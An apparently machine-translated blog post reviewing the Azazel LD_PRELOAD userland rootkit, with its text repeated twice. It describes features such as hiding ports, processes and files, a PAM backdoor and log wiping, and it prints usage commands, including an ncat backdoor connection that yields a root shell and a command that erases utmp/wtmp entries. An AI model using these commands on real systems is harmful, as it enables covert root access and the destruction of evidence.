New Userland-RootKit Azazel
You may have heard about Jynx and Jynx2 rootkits. These are the so-called userland rootkits; they use the LD_PRELOAD variable feature, which allows you to load any libraries before the program is launched. They are already relatively old, but still work well.
2 days ago, Github-user Chokepoint posted a rootkit Azazel . It is based on the Jynx source code and has many new features:
Let's look at them in detail.
Azazel can hide from programs like netstat, ss, lsof. It hides connections with certain ranges of ports assigned during configuration. By default, ports 61040 - 61050 are used for plaintext-backdoor, and 61051 - 61060 - for Crypthook (this is a library that intercepts send / sendto / recv / recvfrom and encrypts / decrypts on the fly). In order for the connection to be hidden, the source port must fall under this range, so you can connect remotely from any computer; you only need to set the source port from the range:
')
Perhaps the most interesting feature. As you may know, a large number of modern programs use PAM to authenticate users. Thus, if we can manipulate PAM authentication, we can authenticate with any user in the system. Azazel does not implement its PAM-module, but intercepts the existing ones.
When you log in to PTY, the wtmp and utmp files are used to save the user state and log I / O. Azazel can clean them either automatically, in the case of a port backdoor, or manually, when automatic cleaning is impossible (for example, if you connect via PAM backdoor to ssh).
Well, there is nothing interesting. Intercepted by ptrace () and returning -1.
Jynx also knew how to hide any files belonging to a specific UID or GID. You can open, read and write to such files, but when listing listings you will not see them.
Azazel hides the processes belonging to a specific GID or UID, as well as files. But sometimes you need to somehow see hidden files and processes, for this you can use a variable, the default is HIDE_THIS_SHELL
Azazel may be hiding from ldd and unhide, just by not infiltrating it. This, of course, uninteresting, but quite an effective method.
If we looked at the strings in the Jynx and Jynx2 libraries, for example, through strings , we would surely understand that this is some kind of bad library, but Azazel simply XOR-it all its strings, and strings will not show anything reasonable.
Protection against this type of rootkits is quite problematic. They are not visible through utilities like rkhunter and chkrootkit . At the moment, there is one way to check for interception of functions, but, theoretically, it is quite possible to intercept functions from libdl.so itself, and then nothing other than the LiveCD and the brains will help.
Take care of your cars.
2 days ago, Github-user Chokepoint posted a rootkit Azazel . It is based on the Jynx source code and has many new features:
- Anti-debugging mechanisms
- Hiding from unhide, lsof, ps, ldd
- Hiding files and directories
- Hiding remote connections
- Hiding processes
- Hiding logins
- Hiding from local traffic sniffing via PCAP
- 2 backdoors with full shell (with PTY):
- - Crypthook accept () - backdoor
- - Normal accept () - backdoor
- PAM backdoor for authentication by any user
- Clearing utmp / wtmp logs for PTY
- Obfuscating compiled library lines with xor.
Let's look at them in detail.
Hiding ports
Azazel can hide from programs like netstat, ss, lsof. It hides connections with certain ranges of ports assigned during configuration. By default, ports 61040 - 61050 are used for plaintext-backdoor, and 61051 - 61060 - for Crypthook (this is a library that intercepts send / sendto / recv / recvfrom and encrypts / decrypts on the fly). In order for the connection to be hidden, the source port must fall under this range, so you can connect remotely from any computer; you only need to set the source port from the range:
$ ncat target 22 -p 61040 changeme Welcome! Here's a shell. root@host:/root # $ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051 changeme Welcome! Here's a shell. root@host:/root/ # ')
PAM backdoor
Perhaps the most interesting feature. As you may know, a large number of modern programs use PAM to authenticate users. Thus, if we can manipulate PAM authentication, we can authenticate with any user in the system. Azazel does not implement its PAM-module, but intercepts the existing ones.
$ make client $ LD_PRELOAD=./client.so ssh rootme@localhost root@host:/ # $ su - rootme # Clearing wtmp / utmp
When you log in to PTY, the wtmp and utmp files are used to save the user state and log I / O. Azazel can clean them either automatically, in the case of a port backdoor, or manually, when automatic cleaning is impossible (for example, if you connect via PAM backdoor to ssh).
$ w | grep pts/16 root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash $ CLEANUP_LOGS="pts/16" ls utmp logs cleaned up. wtmp logs cleaned up. $ w | grep pts/16 $ Anti debugging
Well, there is nothing interesting. Intercepted by ptrace () and returning -1.
$ strace -p $PPID Don't scratch the walls Hiding files and directories
Jynx also knew how to hide any files belonging to a specific UID or GID. You can open, read and write to such files, but when listing listings you will not see them.
Hiding processes
Azazel hides the processes belonging to a specific GID or UID, as well as files. But sometimes you need to somehow see hidden files and processes, for this you can use a variable, the default is HIDE_THIS_SHELL
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061 Hiding from ldd / unhide
Azazel may be hiding from ldd and unhide, just by not infiltrating it. This, of course, uninteresting, but quite an effective method.
Obfuscation of lines
If we looked at the strings in the Jynx and Jynx2 libraries, for example, through strings , we would surely understand that this is some kind of bad library, but Azazel simply XOR-it all its strings, and strings will not show anything reasonable.
Protection against this type of rootkits is quite problematic. They are not visible through utilities like rkhunter and chkrootkit . At the moment, there is one way to check for interception of functions, but, theoretically, it is quite possible to intercept functions from libdl.so itself, and then nothing other than the LiveCD and the brains will help.
Take care of your cars.
Source: https://habr.com/ru/post/212769/
All Articles